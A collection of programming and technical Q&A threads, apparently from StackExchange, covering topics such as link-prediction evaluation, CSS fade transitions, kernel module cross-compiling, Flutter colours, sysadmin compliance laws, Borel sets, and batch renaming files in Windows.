non-edges or paths of non-connected edges to learn which node vectors should be put close together and which should be far. The NE methods will select these samples of non-edges themselves and in different ways, so the user generally doesn't have any control over it. I hope this clarifies your question. To add to the other answer, If you want just to make predictions, all your data is training data and you can make predictions for data that you have not seen. You do not need to split your data into two parts. The splitting is hence only useful to evaluate the performance of link prediction methods. Your drawing above does not reflect a standard machine learning pipeline. Unbiased estimates of performance can be computed only in the following manner: from the train data you construct a model (which here would be two parts; the network embedding and the binary classifier such as logistic regression), from which you can make predictions. You evaluate the predictions on the ground truth that was withheld from the learning process, which is the test set. Hence, the pipeline would be: Left-hand side: Train network -> Network embedding -> LR model -> Predictions Right-hand side: Test network -> Evaluation Cross link from land-hand side ‘Predictions’ directly to right-hand side ‘Evaluation’. So, the predictions are made from the model (for example logistic regression which is in turn based on a network embedding), which is learned on the training data. This is true not just in this link prediction setting but generally for any machine-learning model evaluation setting. As an additional remark, there is no way to align network embeddings learned on the train and the test network, so an approach including a new embedding on the test set would not make sense. Hope fully this clarifies the setting?
common-pile/stackexchange_filtered
How to add delay to Javascript transition? This is my Javascript code - var slideshows = document.querySelectorAll('[data-component="slideshow"]'); slideshows.forEach(initSlideShow); function initSlideShow(slideshow) { var slides = document.querySelectorAll(`#${slideshow.id} [role="list"] .slide`); var index = 0, time = 10000; slides[index].classList.add('active'); setInterval( () => { slides[index].classList.remove('active'); index++; if (index === slides.length) index = 0; slides[index].classList.add('active'); }, time); } This is my markup - <?php foreach( $hero_images as $image_id ): ?> <div class="slide" style="background-image: linear-gradient(rgba(0,0,0, 0.5), rgba(0,0,0, 0.5)), url('<?php echo wp_get_attachment_image_url( $image_id, 'full' ); ?>')"> <div class="text"> <h1>Example</h1> </div> </div> </div> <?php endforeach; ?> I have an array of images from Word Press and have them in the background of the parent div. This is the CSS - [data-component="slideshow"] .slide { display: none; } [data-component="slideshow"] .slide.active { display: block; } It just toggles the CSS display rule The code works and the divs transition between display none and display block, but I want the transition to be smoother. I want to add a fade in. I thought something like this would do it - .slide { opacity: 0; transition: 1s; } .active { opacity: 1 !important; transition: 1s; } But it does not have any affect. Is it possible to add a delay to the transition of display:none to display:block? It is not possible to control the transition from display none to some other value. What you can do is either use some other property to accomplish transition. For example, you can use opacity property (decent solution for fade in / fade out effects) or transform: scale() property (does good job if you desire to gradually increase/decrease content in size). EDIT: I now see you posted example with opacity. Imho, that should work. Your .active selector should be .slide.active, not just .active. You can use a keyframe-animation to controll the timing of your attributes more accurately. Here is an example of a fadein-animation (onclick) using keyframes: <div class="outerContainer"> <div class="testcontainer"> </div> </div> $(".testcontainer").addClass("anim"); $(".outerContainer").on("click",function(){ $(this).find(".testcontainer").toggleClass("active"); }); $(".testcontainer").addClass("anim"); $(".outerContainer").on("click",function(){ $(this).find(".testcontainer").toggleClass("active"); }); .testcontainer{ width:100%; height:100%; background:green; opacity:0; display:none; } .outerContainer{ border: 1px solid black; height:200px; width:600px; } .outerContainer .testcontainer.active{ animation-duration: 2s; animation-name: fadeIn; display:blocK; opacity:1; } @keyframes fadeIn { 0% { opacity: 0; display:block; } 100% { opacity: 1; } } <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script> <div class="outerContainer"> <div class="testcontainer"> </div> </div> I would still recommend you to use a library like jquery or pure javascript for animations like this, since its alot simpler to implement animations in this way. If you have the creative freedom to choose, of course.
common-pile/stackexchange_filtered
hello-1.mod.c:14: warning: missing initializer (near initialization for '__this_module.arch.unw_sec_init') I am trying to write a module for an sbc1651. Since the device is ARM, this requires a cross-compile. As a start, I am trying to compile the "Hello Kernel" module found here. This compiles fine on my x86 development system, but when I try to cross-compile I get the below warning. /home/developer/HelloKernel/hello-1.mod.c:14: warning: missing initializer /home/developer/HelloKernel/hello-1.mod.c:14: warning: (near initialization for '__this_module.arch.unw_sec_init') Since this is in the .mod.c file, which is autogenerated I have no idea what's going on. The mod.c file seems to be generated by the module.h file. As far as I can tell, the relevant parts are the same between my x86 system's module.h and the arm kernel header's module.h. Adding to my confusion, this problem is either not googleable (by me...) or hasn't happened to anyone before. Or I'm just doing something clueless that anyone with any sense wouldn't do. The cross-compiler I'm using was supplied by Freescale (I think). I suppose it could be a problem with the compiler. Would it be worth trying to build the toolchain myself? Obviously, since this is a warning, I could ignore it, but since it's so strange, I am worried about it, and would like to at least know the cause... Thanks very much, Sompom Here are the source files hello-1.mod.c #include <linux/module.h> #include <linux/vermagic.h> #include <linux/compiler.h> MODULE_INFO(vermagic, VERMAGIC_STRING); struct module __this_module __attribute__((section(".gnu.linkonce.this_module"))) = { .name = KBUILD_MODNAME, .init = init_module, #ifdef CONFIG_MODULE_UNLOAD .exit = cleanup_module, #endif .arch = MODULE_ARCH_INIT, }; static const struct modversion_info ____versions[] __used __attribute__((section("__versions"))) = { { 0x3972220f, "module_layout" }, { 0xefd6cf06, "__aeabi_unwind_cpp_pr0" }, { 0xea147363, "printk" }, }; static const char __module_depends[] __used __attribute__((section(".modinfo"))) = "depends="; hello-1.c (modified slightly from the given link) /* hello-1.c - The simplest kernel module. * * Copyright (C) 2001 by Peter Jay Salzman * * 08/02/2006 - Updated by Rodrigo Rubira Branco<EMAIL_ADDRESS> */ /* Kernel Programming */ #ifndef MODULE #define MODULE #endif #ifndef LINUX #define LINUX #endif #ifndef __KERNEL__ #define __KERNEL__ #endif #include <linux/module.h> /* Needed by all modules */ #include <linux/kernel.h> /* Needed for KERN_ALERT */ static int hello_init_module(void) { printk(KERN_ALERT "Hello world 1.\n"); /* A non 0 return means init_module failed; module can't be loaded.*/ return 0; } static void hello_cleanup_module(void) { printk(KERN_ALERT "Goodbye world 1.\n"); } module_init(hello_init_module); module_exit(hello_cleanup_module); MODULE_LICENSE("GPL"); Makefile export ARCH:=arm export CCPREFIX:=/opt/freescale/usr/local/gcc-4.4.4-glibc-2.11.1-multilib-1.0/arm-fsl-linux-gnueabi/bin/arm-linux- export CROSS_COMPILE:=${CCPREFIX} TARGET := hello-1 WARN := -W -Wall -Wstrict-prototypes -Wmissing-prototypes -Wno-sign-compare -Wno-unused -Werror UNUSED_FLAGS := -std=c99 -pedantic EXTRA_CFLAGS := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE} KDIR ?= /home/developer/src/ltib-microsys/ltib/rpm/BUILD/linux-<IP_ADDRESS> ifneq ($(KERNELRELEASE),) # kbuild part of makefile obj-m := $(TARGET).o else # normal makefile default: clean $(MAKE) -C $(KDIR) M=$$PWD .PHONY: clean clean: -rm built-in.o -rm $(TARGET).ko -rm $(TARGET).ko.unsigned -rm $(TARGET).mod.c -rm $(TARGET).mod.o -rm $(TARGET).o -rm modules.order -rm Module.symvers endif Hi there, welcome to SO. Could you please edit your question to clarify which errors you are getting and when? The error in the title is a warning you see when you compile locally? but the error in the question is when you cross compile? Hi @Deepend, The error is the same, just that I compressed the error in the title onto one line to make it less unwieldy. Thanks, Sompom Looks like the macro MODULE_ARCH_INIT is undefined when the the preprocessor gets to line 14. Maybe it was in the regular compiler makefile but not the cross-compiler makefile? Hmm. I copied the same Makefile, only adding the top three "export" lines to make it cross-compile. The reference I have to that macro is http://lxr.free-electrons.com/source/include/linux/module.h?v=2.6.34#L383 . The cross-compiling kernel headers have the same reference in the same place. The line doesn't make any sense to me, since if it's defining it as {}, it would do nothing. But I suppose that's what I'm seeing. @Deepend Your last edit suggestion was incorrect, I think: the OP was correct in classifying this as a warning rather than an error, and already explained that it happened when cross-compiling. @hvd Changed that to warning. I moved the reference to cross-compile from below the warning to above to improve the flow of English. @Deepend Thanks. Personally I think that was minor enough that it could be left as is, but if you did think it was unclear as it was, you were right to suggest to change it. First, that statement that a warning can be ignored is (almost) always false. Warnings should/must always be fixed. Apparently MODULE_ARCH_INIT is a macro defined as some sort of { ... } initializer. GCC is known for issuing overly paranoid (and downright malicious) warnings for such initializers when they don't cover every field in the target aggregate, even though the language spec says that everything is OK. Here is an example of that warning issued for the perfectly safe (and idiomatic) = { 0 } initializer: Why is the compiler throwing this warning: "missing initializer"? Isn't the structure initialized? I'd guess that your MODULE_ARCH_INIT is defined as something that does not cover every field of the target struct and triggers the very same warning for the very same reason. The language guarantees that in such cases non-covered fields are zero-initialized, but GCC is just not sure whether zero is what you want to initialize those fields with. Hence the warning.
common-pile/stackexchange_filtered
The argument type 'Color?' can't be assigned to the parameter type 'MaterialColor? I want to set the background Colors.yellow[700] in flutter,but when i add symbol "[]" or Colors.yellow.shade600, but i can't set the value for background. It shows error & the error is The argument type 'MaterialColor' can't be assigned to the parameter type 'Paint' If you want primarySwatch with Colors.yellow[700] as primaryColor you would have to create your own MaterialColor from color Colors.yellow[700] like this final Map<int, Color> _yellow700Map = { 50: Color(0xFFFFD7C2), 100: Colors.yellow[100], 200: Colors.yellow[200], 300: Colors.yellow[300], 400: Colors.yellow[400], 500: Colors.yellow[500], 600: Colors.yellow[600], 700: Colors.yellow[800], 800: Colors.yellow[900], 900: Colors.yellow[700], }; final MaterialColor _yellow700Swatch = MaterialColor(Colors.yellow[700].value, _yellow700Map); and then add it as primarySwatch: _yellow700Swatch, or if you want only your background to be Colors.yellow[700] you can use canvasColor like this canvasColor: Colors.yellow[700],. Also you can use colorScheme property and set like below : theme: ThemeData( colorScheme: ColorScheme.fromSwatch().copyWith( primary: const Colors.yellow[700], secondary: const Colors.yellow.shade700, // or from RGB primary: const Color(0xFF343A40), secondary: const Color(0xFFFFC107), ), ), primarySwatch only takes a ColorSwatch not a colorShade if you want to use a shade you can try ThemeData( primaryColor: Colors.yellow[700] ) for more info primaryColor if you want to use your own custom colors in the primarySwatch of a theme, then declare this: MaterialColor mainAppColor = const MaterialColor(0xFF89cfbe, <int, Color>{ 50: Color(0xFF89cfbe), 100: Color(0xFF89cfbe), 200: Color(0xFF89cfbe), 300: Color(0xFF89cfbe), 400: Color(0xFF89cfbe), 500: Color(0xFF89cfbe), 600: Color(0xFF89cfbe), 700: Color(0xFF89cfbe), 800: Color(0xFF89cfbe), 900: Color(0xFF89cfbe), }, ); then in your themeData, apply this color to the primarySwatch like that: @override Widget build(BuildContext context) { return MaterialApp( theme: ThemeData( primarySwatch: mainAppColor, ), home: const SomeBlaBlaPage(), ); } I was having the same problem, in a situation where I was trying to pass the color value as a parameter to a flutter class. My problem is that there are multiple uses of the words "Color", "color", and "Colors" as used in the default application. In the "Material You" framework there is a class named MaterialColor. This is not stated. All colors in Material classes are of type MaterialColor. The "Colors" class is a Material class that has public elements having the primary colors are names. Each of these elements is a List of type "MaterialColor". The problem is that Dart the base language of flutter. It too has a class named Color. Because of type safety the two classes MaterialColor and Color are incompatible. Therefore whenever you want to create or reference a color in the Material frame work, use the type MaterialColor rather than the Dart type "Color" And be careful when you read a parameter named color or colors! Think to yourself that this parameter is really of type MaterialColor, and not the Dart Color type. All elements of type color in the Material framework are of type MaterialColor! Color dColor = const Color(0xFF42A5F5); // Dart MaterialColor mColor = Colors.green; // Material dColor = mColor; // Error; mColor = dColor // Error; There is no automatic conversion for these two different types And how to solve problem, when I need Color, but have value of MaterialColor type?
common-pile/stackexchange_filtered
Check if working on databricks notebook or ont For some functions I need to split logic for databricks notebook with big cluster and for local machines. So is there a way to check, if R runs on databricks notebook. Like some tag in Sys.info() or something ? You control the environment. Just a set a variable on submit, and check it from the application. I found solution in .Platform$GUI. if it is equal to RStudio (in my case only RStudio) this is a local machine, in other cases databricks notebook This will be true for linux as well, not only Databricks You can try: if (NROW(grep('DATABRICKS', names(Sys.getenv()))) > 0 ){ print("We are on Databricks")}else{ print("We are not on Databricks")}
common-pile/stackexchange_filtered
What legal gotchas should a sysadmin be familiar with? What legal issues should you research as a sysadmin to avoid you, or your employer, being accused of negligence, or of violating privacy, etc? While laws vary from country to country and state to state, it could still be enlightening if you have an example of a law which you, or someone you know, has broken without realizing it. btw, wish i had a good synonym for "gotcha" - i hate that word. It largely varies on a few things like what industry you're in (the following applies to the USA only)... Health Care: HIPAA Education: FERPA If your company is traded with the SEC: Sarbanes Oxley If your company does credit card transactions - PCI DSS A lot of the smaller jobs I've worked have been pretty bad about PCI DSS storing CC info in plaintext, publicly accessible database server... basics that were just neglected. One of the challenges, particularly for small businesses, is that some of the regulations mentioned (HIPAA for instance) can be confusing or ambiguous. The theory is that the regs are written not to force companies to lock-in to particular solutions, but taking that wiggle room for granted could be problematic. +1 @Milner, attempts in these regulations to be 'technology agnostic' leave little clear direction, which is both good and bad. The best most of us can do is have a clear Policy + Procedures that explains how you address the gray areas -- and then sticking to it (or revising, then sticking to it). Having to explain why you didn't follow your own SOP is a bad situation. Can we add federal rules of discovery (http://www.law.com/jsp/legaltechnology/pubArticleLT.jsp?id=1202429657841&Guidelines_to_Craft_EMail_Retention_Policies) in the US (retention requirements). Also, breach notification laws exist in many states and a federal healthcare information breach notice standard was passed as part of ARRA and is currently being drafted (http://www.dwt.com/LearningCenter/Advisories?find=79311) The following applies to the USA only; CIPA: Children's Internet Protection Act Specially if you're employed by an state or federal educational entity: http://www.fcc.gov/cgb/consumerfacts/cipa.html FOIA: Freedom of Information Act Again if you're employed by a government entity: http://www.fcc.gov/foia/ FERPA: Family Educational Rights and Privacy Act Education: http://www.ed.gov/policy/gen/guid/fpco/ferpa/index.html Child Porn - your business can go under because your servers were in a datacenter NEXT TO some servers that had child porn on them (in the US). You really can't be too paranoid about this. Be aware of the legal side of network analysis and intrusion detection. Some places, an unauthorized use of nmap can be considered a crime, as can trying to break into systems for security (non-malicious) purposes. Be aware of software licensing issues, both for end users (if you deal with them) and for your servers and other sysadmins. Know the possible ramifications if you choose to run pirated software on a business server. Be aware of privacy laws for your place of business, on the local, state, and federal law. Know what info you are and aren't allowed to store. Also know what info you are and aren't allowed to look at, both in legal terms and as laid down by your company guidelines. On the flip side, be aware of information retention laws for your place of business. Know what info you're required to keep, how long you need to keep it, and who you have to divulge it to when requested. Be able to draw the line between privacy and complying with regulations (and know when to stand up for one or the other). There's more to licensing than just piracy. Lots of software we take for granted at home that has liberal personal-use licenses are much more restrictively licensed for commercial use. It's not safe to assume it's freeware everywhere. I'm in the UK, and I'd say the most important laws to an average ecommerce business would be: The Data Protection Act Distance Selling Regulations and Trade Descriptions Act Certain parts of The Companies Act - for example you have to have your registered company number and address on a business website even if you don't sell anything. I've seen that one broken many times. PCI Compliance (ok, not a law but important) This question can actually only be answered if you tell us where you are located. Personally I consider the SysAdmin to be the person that is in charge of each and every bit of data, thus carries the largest risk when data is lost/exposed/abused (Even if you won't face legal consequences your boss will come to you and you will have to explain why on earth the data could get out of your company). I personally make sure that: In case it's needed I can access each piece of information (everything, after all I'm the standing on the wrong side of the fan when shit hits it) I tell this to my boss I tell my boss that I won't access anything without permission I tell my boss that I will ask for another party to watch me and the requestor if I don't feel comfortable with the data access request I want all of the above signed and sealed in a written manner Other things I make sure: Hear everything See everything Talk about nothing These points aren't about snooping around in files or anything like that, it's just about the regular chatting with colleagues and co-workers and trying to fit together the different pieces. Talk about nothing nothing means to not participate in the chatting from a certain point, people come to me regularly with requests about lost passwords, files to be restored or other stuff. That could lead back to ceertain opinions about otherwise hard working people, I don't want that. Tell everyone about the stuff my boss and I agreed over This can be in terms of talking from person to person, company mails or posters with friendly reminders that there's a party in the company that could access all data. These aren't exactly examples of laws colleagues or I stumbled over. But that is the part where "Talk about nothing" comes to play. Sorry to disappoint you with examples. Your Data Protection legislation. Your employer's AUP - know it inside out - it applies to you too! There are various state legislationss concerning PII (Personally Identifiable Information) in the event of a data breach. California's 1386 requires that everybody who as affected by the data breach (compromise of their information) must be notified. Many other states have similar provisions. Also as a clarification on PCI-DSS, that is not a strictly legal requirement, the card brands (MasterCard, Visa, Discover, AmEx) require their merchant banks to require the vendors to adhere to PCI-DSS. If you violate PCI, you won't prosecuted legally, however you can be fined thousands of dollars a day (or more) by your merchant bank while you are in violation. If you don't come into compliance, you will eventually lose your ability to do credit card transactions, which would be a kiss of death for most online retailers. PCI DSS for customers who take credit cards, and the chance that every time you enable logging that you might be required to produce those logs in the future. Sometimes it is better not to have recorded anything. E-discovery is a big "gotcha." These are the requirements in the US to preserve electronic information in the event of a lawsuit, and to make it available to the other party. The sysadmin should spend some time with the company's lawyers BEFORE the first time the company is sued so that you have a plan in place to comply with these requirements if you ever have to. Failure to preserve all the necessary electronic records (and in the right way) immediately upon a lawsuit coming up and hurt the company tremendously (including losing a lawsuit that might not otherwise have been lost). In a policing or crown council environment, you need to be careful when handling digital evidence. The last thing you want is to be required to testify in court when all you did was help convert some sort of media from one format to another.
common-pile/stackexchange_filtered
Partial Views using data grids I am trying to call in two partial views but my program is trying to populate my web grid before I pass it a search parameter. I can't figure out how to keep it from trying to render the webgrid before I pass it the text in the searchbox. This is in my partial view: <div class="webgrid-wrapper"> <div class="webgrid-title">Values</div> <div id="grid"> @grid.GetHtml( tableStyle: "webgrid", headerStyle: "webgrid-header", footerStyle: "webgrid-footer", alternatingRowStyle: "webgrid-alternating-rows", columns: grid.Columns( grid.Column("Id", "ID"), grid.Column("Name", "Name") ) ) </div> </div> </div> This is my Home view where I'm pulling both of the partial views into: <section class="featured"> <div class="content-wrapper"> <hgroup class="title"> <EMAIL_ADDRESS><EMAIL_ADDRESS> </hgroup> </div> </section> @using (Html.BeginForm("Analysis", "Home", "POST")) { <div class="searchField"> <div class="searchbox"> Search: <input type="text" name="Search" /> <input type="submit" value="Submit"> </div> </div> } @Html.Partial("PartialChemAnalysis") @Html.Partial("PartialSlagView") you can do this by checking the search parameter if it has a value, if no, then you dont have to render the grid. in your controller public ViewResult Analysis(string search) { ViewBag.DisplayGrid = !string.IsNullOrEmpty(search); //do you logics then return } in your view @if (ViewBag.DisplayGrid != null && ViewBag.DisplayGrid) { //Render your partial since its true. @Html.Partial("PartialChemAnalysis") @Html.Partial("PartialSlagView") } upon initial load or if there are no search parameter. the viewbag will be set to false, and your partial will not be rendered. and will rendered if the search parameter has value.
common-pile/stackexchange_filtered
lz4 includes not found When building on Mac Sierra, I got an error, and then used this command to reproduce. By the way, excellent logging and tools for trying to narrow down the problem! Anyway, here's the command: cd /Users/pitosalas/ros_catkin_ws/build_isolated/roslz4 && /Users/pitosalas/ros_catkin_ws/install_isolated/env.sh cmake /Users/pitosalas/ros_catkin_ws/src/ros_comm/roslz4 -DCATKIN_DEVEL_PREFIX=/Users/pitosalas/ros_catkin_ws/devel_isolated/roslz4 -DCMAKE_INSTALL_PREFIX=/Users/pitosalas/ros_catkin_ws/install_isolated -DCMAKE_BUILD_TYPE=Release -G 'Unix Makefiles' This command gives the following error in trying to build roslz4 and I can't find any info on where to look to fix it. -- Using CATKIN_DEVEL_PREFIX: /Users/pitosalas/ros_catkin_ws/devel_isolated/roslz4 -- Using CMAKE_PREFIX_PATH: /Users/pitosalas/ros_catkin_ws/install_isolated -- This workspace overlays: /Users/pitosalas/ros_catkin_ws/install_isolated -- Using PYTHON_EXECUTABLE: /usr/local/opt/python/libexec/bin/python -- Using default Python package layout -- Using empy: /usr/local/lib/python2.7/site-packages/em.pyc -- Using CATKIN_ENABLE_TESTING: ON -- Call enable_testing() -- Using CATKIN_TEST_RESULTS_DIR: /Users/pitosalas/ros_catkin_ws/build_isolated/roslz4/test_results -- Found gtest: gtests will be built -- Using Python nosetests: /usr/local/bin/nosetests-2.7 -- catkin 0.7.6 CMake Error at CMakeLists.txt:13 (message): lz4 includes not found -- Configuring incomplete, errors occurred! See also "/Users/pitosalas/ros_catkin_ws/build_isolated/roslz4/CMakeFiles/CMakeOutput.log". Originally posted by pitosalas on ROS Answers with karma: 628 on 2017-07-21 Post score: 0 This is part of the many problems in getting ROS up on Mac. You can read my summary of this experience in another question. Bottom line, I abandoned trying to install it on Mac, there are just too many loose ends. I am having far better success with running ROS under VMWare with Ubuntu. Originally posted by pitosalas with karma: 628 on 2017-07-30 Post score: 0
common-pile/stackexchange_filtered
Summarize data in one row selecting MAX or MIN date I have a set of data from multiple tables on SQL Server. They include transactions on different dates that are related to a customers. I want to create a SQL Server view that has one line per customer. For date, I want to use the latest or earliest date. The date is in numeric format so I thought I can use MAX or MIN to create the view, but I am not sure what I am doing wrong that it is not happening. In short, I want to have the total of AMOUNT_TR and for date I want the one of the dates in in case of the above example 20160608 or 20140228. How do you identify the customer? assuming customer_id is your customer column. you can create a subquery that contains the max() date and customer_id then join to your main table to use other columns. select t1.* from tableA t1 inner join (select customer_id, max(date_tr) date_tr from tableA group by customer_id) t2 on t2.customer_id = t1.customer_id and t1.date_tr = t2.date_tr Is this what you want? select customer, sum(amount_tr), min(date_tr), max(date_tr) from t group by customer;
common-pile/stackexchange_filtered
Cardinality argument in proving that not every Lebesgue measurable set is a Borel set Hello I need help understanding a proof. The proof is from Rudin's Real and Complex Analysis. The proof is supposed to address the question: Is every Lebesgue measurable set a Borel set? Let $c$ be the cardinality of the continuum (the real line or, equivalently, the collection of all sets of integers). We know that $\mathbb R^k$ has a countable base (open balls with rational radii and with centers in some countable dense subset of $\mathbb R^k$) and that $\mathcal B_k$ (the collection of all Borel sets of $\mathbb R^k$) is the $\sigma$-algebra generated by this base. It follows from this that $\mathcal B_k$ has cardinality $c$. On the other hand, there exist Cantor sets $E\subset\mathbb R^1$ with $m(E)=0$ (where $m$ is a measure). The completeness of $m$ implies that each of the $2^c$ subsets of $E$ is Lebesgue measurable. Since $2^c>c$, most subsets of $E$ are not Borel sets I do not understand why the $2^c$ is needed. Neither do I understand how it is so suddenly introduced. Where does the $2^c$ come from? Also, how does the fact that $2^c>c$ show that most subsets of $E$ are not Borel sets? What is the relation between cardinality and Borel sets? A cantor set has cardinality $c$. So its power set, the set of all its subsets, has cardinality $2^c$. But Rudin just showed the set of Borel sets has cardinality $c$. I need help understanding your question. You said: "I do not understand why the $2^c$ is needed." I guess that means you think it can be proved without $2^c$? So why don't you show us how you would prove without $2^c$ that there are measurable suts which are not Borel sets? ". . . it is so suddenly introduced. Where does the $2^c$ come from?" Yes, Rudin's explanation, "The completeness of $m$ implies that each of the $2^c$ subsets of $E$ is Lebesgue measurable," is a bit terse. A verbose paraphrase: "The completeness of $m$ implies that each subset of $E$ is Lebesgue measurable. How many sets is that? Well, the set $E$ has $c$ elements, so it has $2^c$ subsets." On the one hand he’s shown that $\Bbb R^k$ has $\mathfrak{c}$ Borel sets. On the other hand, there is a Cantor set $E\subseteq\Bbb R^1$ such that $m(E)=0$. Since $m$ is complete, this implies that every subset of $E$ is Lebesgue measureable with measure $0$. Since $|E|=\mathfrak{c}$, $E$ has $2^{\mathfrak{c}}$ subsets, so we know that $\Bbb R^k$ has $2^\mathfrak{c}$ Lebesgue measurable subsets. However, it has only $\mathfrak{c}$ Borel subsets, and $\mathfrak{c}<2^{\mathfrak{c}}$. Let $\mathscr{S}_k$ be the family of subsets of $\Bbb R^k$ that are Lebesgue measurable but not Borel. If $|\mathscr{S}_k|$ were less than $2^{\mathfrak{c}}$, the family of Lebesgue measurable subsets of $\Bbb R^k$, being the union of $\mathscr{B}_k$ and $\mathscr{S}_k$, would have cardinality $$|\mathscr{S}_k|+|\mathscr{B}_k|=|\mathscr{S}_k|+\mathfrak{c}=\max\{|\mathscr{S}_k|,\mathfrak{c}\}<2^{\mathfrak{c}}\;,$$ which is false. Thus, we must have $|\mathscr{S}_k|=2^{\mathfrak{c}}$: $\Bbb R^k$ has as many Lebesgue measurable subsets that are not Borel as it has subsets altogether. Since it has only $\mathfrak{c}<2^{\mathfrak{c}}$ Borel subsets, it’s fair to say that most of its Lebesgue measurable subsets are not Borel. More generally, if $\kappa$ is an infinite cardinal, $A$ is a set of cardinality $\kappa$, and $B\subseteq A$ is of cardinality $\lambda<\kappa$, then $|A\setminus B|=\kappa$: throwing away a smaller subset of an infinite set does not reduce the cardinality. The question is what does "most subsets" mean. Especially in the context of measure, it should be clear that "most" could mean different things (e.g. most numbers in $[0,1]$ are irrational; but also most of them lie outside the Cantor set; and even if you have a fat Cantor set of measure $0.9$ in another sense [it is nowhere dense], still most numbers lie outside of it). But one thing seems to be very clear, if $A\subseteq X$ and there is a significant cardinality difference between $A$ and $X\setminus A$, then we can say that most elements lie in the larger set. So if there are only $\frak c$ Borel sets, but $2^\frak c$ Lebesgue measurable sets, then almost all the Lebesgue measurable sets are not Borel sets, since $2^\frak c$ is significantly larger than $\frak c$. Similar reasoning shows that most subsets of $\Bbb R$ are not Borel either. You can ask whether or not "most" subsets of $\Bbb R$ are Lebesgue measurable, since both collections (measurable and non-measurable) are of size $2^\frak c$, this requires finer tools than cardinality, and this is a whole different question.
common-pile/stackexchange_filtered
Rename multiple files in cmd If I have multiple files in a directory and want to append something to their filenames, but not to the extension, how would I do this? I have tried the following, with test files file1.txt and file2.txt: ren *.txt *1.1.txt This renames the files to file1.1.txt and file2.txt1.1.txt I want the files to be file1 1.1.txt and file2 1.1.txt Will this be possible from cmd or do I need to have a bat file to do this? What about PowerShell? are there a lot of files? Theres about 90 in a folder You can also do this with just the UI if you want. Select all the files, rename one to "file" and it will show up as file (1), file (2), file(3), file (4), etc. @Morne, You can also use a tool like Massive File Renamer http://superuser.com/a/730292/78897 for /f "delims=" %%i in ('dir /b /a-d *.txt') do ren "%%~i" "%%~ni 1.1%%~xi" If you use the simple for loop without the /f parameter, already renamed files will be again renamed. what '~n' in "%%~ni 1.1%%~xi" stands for? i dont understand how it work... Read the for documentation, it explains how variable placeholders work. Make sure that there are more ? than there are characters in the longest name: ren *.txt "???????????????????????????? 1.1.txt" See How does the Windows RENAME command interpret wildcards? for more info. New Solution - 2014/12/01 For those who like regular expressions, there is JREN.BAT - a hybrid JScript/batch command line utility that will run on any version of Windows from XP forward. jren "^.*(?=\.)" "$& 1.1" /fm "*.txt" or jren "^(.*)(\.txt)$" "$1 1.1$2" /i The absolute max file name length is 255 characters. But the practical limit for most scenarios is less, since the max total path lengh supported by the Windows UI is 259 characters. The total path length includes volume, folder, and file name information, plus a null terminator. See http://msdn.microsoft.com/en-us/library/aa365247.aspx for more info. Thanks for introducing jren, it was exactly what I needed, simple short and fast. Btw, with it it's possible to use shorthand character classes like \d or \w. @Armfoot - Yes - JREN uses standard JSCRIPT regex, so the shorthand character classes are supported. You can read the Microsoft regex syntax documentation . Step 1: Select all files (ctrl + A) Step 2 : Then choose rename option Step 3: Choose your filename... for ex: myfile it automatically rename to myfile (01),myfile (02),,..... If you want to replace spaces & bracket.. continue step 4 Step 4: Open Windows Powershell from your current folder Step 5: For replace empty space to underscore (_) dir | rename-item -NewName {$_.name -replace [Regex]::Escape(" "),"_"} Step 6: For replace open bracket dir | rename-item -NewName {$_.name -replace [Regex]::Escape("("),""} For replace close bracket dir | rename-item -NewName {$_.name -replace [Regex]::Escape(")"),""} Credits perhaps to https://www.howtogeek.com/111859/how-to-batch-rename-files-in-windows-4-ways-to-rename-multiple-files ? I did the same thing for renaming all images and videos in a folder. But when filetype changes the number again starts from 1. Could you please check this question of mine https://stackoverflow.com/questions/77478281/rename-all-the-items-in-a-folder-without-checking-the-type-of-file-in-windows-os The below command would do the job. forfiles /M *.txt /C "cmd /c rename @file \"@fname 1.1.txt\"" source: Rename file extensions in bulk +1 I think this is the easiest one to remember, much simpler than the for syntax of cmd, but the letdown is that it has to spawn a new cmd.exe process for every iteration. That makes this very inefficient and slow as molasses. Try this Bulk Rename Utility It works well. Maybe not reinvent the wheel. If you don't necessary need a script this is a good way to go. still a good solution if you do not want to .... script @echo off for %%f in (*.txt) do ( ren "%%~nf%%~xf" "%%~nf 1.1%%~xf" ) For someone will not run : for %f in (*.txt) do (ren "%~nf%~xf" "%~nf 1.1%~xf") I found the following in a small comment in Supperuser.com: @JacksOnF1re - New information/technique added to my answer. You can actually delete your Copy of prefix using an obscure forward slash technique: ren "Copy of .txt" "////////" Of How does the Windows RENAME command interpret wildcards? See in this thread, the answer of dbenham. My problem was slightly different, I wanted to add a Prefix to the file and remove from the beginning what I don't need. In my case I had several hundred of enumerated files such as: SKMBT_C36019101512510_001.jpg SKMBT_C36019101512510_002.jpg SKMBT_C36019101512510_003.jpg SKMBT_C36019101512510_004.jpg : : Now I wanted to respectively rename them all to (Album 07 picture #): A07_P001.jpg A07_P002.jpg A07_P003.jpg A07_P004.jpg : : I did it with a single command line and it worked like charm: ren "SKMBT_C36019101512510_*.*" "/////////////////A06_P*.*" Note: Quoting (") the "<Name Scheme>" is not an option, it does not work otherwise, in our example: "SKMBT_C36019101512510_*.*" and "/////////////////A06_P*.*" were quoted. I had to exactly count the number of characters I want to remove and leave space for my new characters: The A06_P actually replaced 2510_ and the SKMBT_C3601910151 was removed, by using exactly the number of slashes ///////////////// (17 characters). I recommend copying your files (making a backup), before applying the above. I tried pasting Endoro's command (Thanks Endoro) directly into the command prompt to add a prefix to files but encountered an error. Solution was to reduce %% to %, so: for /f "delims=" %i in ('dir /b /a-d *.*') do ren "%~i" "Service.Enviro.%~ni%~xi" I was puzzled by this also... didn't like the parentheses that windows puts in when you rename in bulk. In my research I decided to write a script with PowerShell instead. Super easy and worked like a charm. Now I can use it whenever I need to batch process file renaming... which is frequent. I take hundreds of photos and the camera names them IMG1234.JPG etc... Here is the script I wrote: # filename: bulk_file_rename.ps1 # by: subcan # PowerShell script to rename multiple files within a folder to a # name that increments without (#) # create counter $int = 1 # ask user for what they want $regex = Read-Host "Regex for files you are looking for? ex. IMG*.JPG " $file_name = Read-Host "What is new file name, without extension? ex. New Image " $extension = Read-Host "What extension do you want? ex. .JPG " # get a total count of the files that meet regex $total = Get-ChildItem -Filter $regex | measure # while loop to rename all files with new name while ($int -le $total.Count) { # diplay where in loop you are Write-Host "within while loop" $int # create variable for concatinated new name - # $int.ToString(000) ensures 3 digit number 001, 010, etc $new_name = $file_name + $int.ToString(000)+$extension # get the first occurance and rename Get-ChildItem -Filter $regex | select -First 1 | Rename-Item -NewName $new_name # 